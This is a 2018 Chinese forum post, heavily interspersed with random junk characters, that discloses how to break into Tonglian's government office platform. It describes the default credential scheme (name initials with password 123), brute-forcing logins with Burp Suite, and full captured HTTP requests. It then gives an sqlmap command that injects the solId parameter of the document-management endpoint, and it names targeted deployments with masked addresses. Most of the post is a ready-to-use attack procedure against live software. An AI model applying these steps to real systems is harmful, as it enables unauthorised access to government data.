|
. W* {& h: `( F E0 @$ W$ n7 v4 L
. a+ r$ h; v0 S: F* O
2 B& n" r/ A8 l P' E2 _3 j- n6 E- W: d3 @
平台简介:6 ~# t f4 U n# w
$ d$ t; d9 w8 f6 W4 s
3 B, \& I' X0 {2 d9 F. e4 C4 H
0 M% B9 H: l: M- M# A$ b* v
3 i3 W$ Q+ Y- ^5 ~, r
( h g- j$ t; S7 w 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" w$ U3 B9 M; C: q
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: O D& K* g! Z4 ?6 I
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 J: g- B) G- S- c+ q
2 b& U0 ?7 t* s u# ]9 {; h
; V! t( v1 P/ j) h, Y
+ Z! l" w( Y1 m; k! \2 X1 F( N ! Y# ~' |3 E2 z" b2 @8 ?
. Z3 a1 a% l+ P* N x 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
5 x% _% e4 y% T; ]: O& _( Y 0 ~$ X3 n ~6 T1 t! m: I8 c/ `) E
" P, d- t0 u% n& m8 f: X- d 4 {% u1 P) @7 O* |+ C- I
1 P7 A) J4 X# m0 g0 c; b# h
$ j' s1 n+ d* [7 V% w- c* q) A http://1.1.1.1:7197/cap-aco/#(案例2-)
* Z% Y2 n0 b4 T( N ) Z& z& d3 e6 Y" K% _
' [6 x+ m% h0 n2 h( A9 o1 O5 ? http://www.XXOO.com (案例1-官网网站)3 U. k1 M* Z" A5 T- X3 d
t8 d5 P) K3 s# E/ u$ }) N" i% [8 c
0 B' Q3 ?( m7 Z5 h [
. S. T9 m- f# j Z7 Y
* T; g- \" D( I2 F% ~ 漏洞详情:+ l6 n9 a' A8 t+ ^
" ~2 e4 F: J% d4 Z2 @6 D& j
+ y, W8 s- R) {
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
q& Z6 r9 ^- q& M: ] Z, s 0 \- M0 L* s' f4 e
$ ^, g, u9 P( L( B' ^
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
+ \& S0 b/ l7 Z" i2 m9 z , h g/ M0 f1 P
1 `/ Z- v# j% S8 ? - k$ C+ O( {6 `+ ~$ Z- ?9 c% r m
' |' Y' o$ N/ [" ]8 @
# `2 n m) `. |$ Z6 i1 a
" J; S* L8 s- V" x
2 K" R: ]% K" N5 e
- Q4 K2 I, W. r/ V status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
# d+ k9 p; c* P
" i3 @& g" P% b! j' G, W) \; a R: h& x1 T: F2 H
1、案例1-官方网站
3 N) l" T' D# O; `4 F, W 2 t- {% \+ m& O7 o+ M/ t7 J( o
$ u$ z+ r: D3 Q GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1$ D% ^5 `- K& o! X1 ~% k
. l0 I0 M4 I# g3 d+ }& j8 k5 N; B7 {
5 ]& i# v0 G" R% G$ v- x* ] Host: www.XXOO.com
+ u& g, T) u. h- ~
% R6 M1 ]; o3 Y3 c6 d, g
$ E0 V, m ~/ \0 k4 h; c4 w, M Proxy-Connection: Keep-Alive' R! T5 {; L3 l. o/ e6 S: H
8 d# y, O) `/ n
a$ ?0 H6 H- ^ Accept: application/json, text/javascript, */*; q=0.01
- |7 V$ F9 S' y
% o" s9 m K( ^* G& @- i1 r# |4 [- {
Accept-Language: zh-CN
# N6 g$ i# K& X" T ' I1 v* T3 S) \! t( L8 M( w
4 f* j- {8 E. Y8 b
Content-Type: application/json
9 o Z/ k5 J% }; c8 ^5 m
8 B# C! ^3 ]: E
& n* {' W0 |0 x r User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
- t7 t9 {) [0 T3 ]# _
# H' n& X" F8 F* m' [
4 J) v2 T4 F M3 Z: l2 } X-Requested-With: XMLHttpRequest" {" K# z& B" g$ _" o( {: [4 C
9 ^6 q/ ?1 J7 W( ]
* S8 O" \9 j Q! K3 b3 i
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
8 i5 x- w4 r. O
+ r7 w0 l/ U- v4 F, [5 Q ~& E9 k
. |% x' M+ E) Z$ H, n! K5 s Accept-Encoding: gzip, deflate, sdch2 H! p7 v: C! }
/ b% U0 K: C) A8 B, z& ]4 {; _
6 s, H' i5 S8 m1 C- L
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e' h2 _9 h! ^8 Z& p) A- `2 X
! N+ f5 f& L. _" E. @: U( `! \# k R6 b/ j4 r
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
& f! X5 y; F2 ~, n+ V 6 N0 p( I C" i9 q
9 x0 K" j# _. m! f3 F. Y  $ h" T3 B" R9 }. t
0 q# S& D7 W& `" G7 M0 g+ x( P" N; }; c* E$ A' \' j
( e; ]0 |" [, p/ k
- x$ I- d/ \( W" d
: l4 O& D, u, s1 I7 X H+ @( B
% y7 \: ]2 X/ \0 u( P9 h
4 Z- T9 }' q9 |, }: E t: Z7 m. z$ M
$ x, g7 I. |6 ?* z# r: x3 l, I1 V k M0 _
# m: o/ h4 G& C s
" u' u' u4 ^: e , z( `8 F) r: \9 @9 b2 t# ?
6 x" T! g- ?# t8 i! y3 a& v
7 }5 F- f3 E' r( F% ?# t T 2、案例2-某天河云平台
. K _: \6 {# V) [
. s! I/ `2 Y# L( P1 h
& z5 c. g! K; g: q5 e8 a) f4 @ GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1) N( a! f7 { y) U7 K! n) m# b
' X4 m; D k# p9 b8 w
; U3 P: G8 ]' Q' I/ K& `! Z- w4 T Host: 1.1.1.:7197% Z, u9 W7 H' Z9 D
& y/ r6 c- m% b7 g
9 C0 x, x, Z8 n& j. R ~ Accept: application/json, text/javascript, */*; q=0.01
1 o6 u5 k8 k0 p: z# q2 ] ( s( l. E2 a+ w5 U% p+ S( b
$ O$ |% K1 k- Q* R; q" a1 g- [3 Z
X-Requested-With: XMLHttpRequest/ b+ t% ^0 y' W" p5 v/ R
0 v: H- O- Q @' F1 K+ z4 D7 j
/ T; N& Y7 z2 l4 q- ~ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
% Q" t5 S7 f5 O( V7 C+ r
& t9 A; C$ Y) M7 }* [! y2 } x% W" V1 M+ n' L! J" z* Y* ?
Content-Type: application/json
7 E% K0 l2 e/ i$ U , C/ z, X3 }) } {
2 ]8 s4 f* @9 r* `: _3 ^4 t
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10088 k3 w3 v7 C) u- ?* r
4 g/ @8 l" h; T! `& w/ @+ ?
7 x% @! O9 Y$ R7 _ Accept-Language: zh-CN,zh;q=0.8
# T: N/ c3 @# W1 U4 W4 T1 L( o3 r
0 h1 g# {; L# Q& f# V2 S
|4 y1 N/ K% o" f0 j Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
% G/ A- i) W! R2 y5 N1 ^2 ] $ B9 t7 P2 a1 \' _/ [0 W# o! {: ~
3 G7 }& }* @: w9 x! c Connection: close
6 }6 v5 r8 `0 d2 b$ z ) i: x. p/ L& f( D- m
1 e# r" t P4 Y( R0 {6 ] 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 P* A9 q$ B I6 L) [# K1 |5 H, k % o, N( H) b5 F4 [
$ U3 \% o# n, b# C) l) }" ~  6 r* h7 P6 w4 O+ o9 _: k. ]7 [
* ]% B+ A2 V6 A* T8 d2 S
1 [! ~( A% R# R3 _. i* g
" F3 q& d4 N1 Z" B3 i | 
发表于 2018-10-20 20:15:17
收藏
支持
反对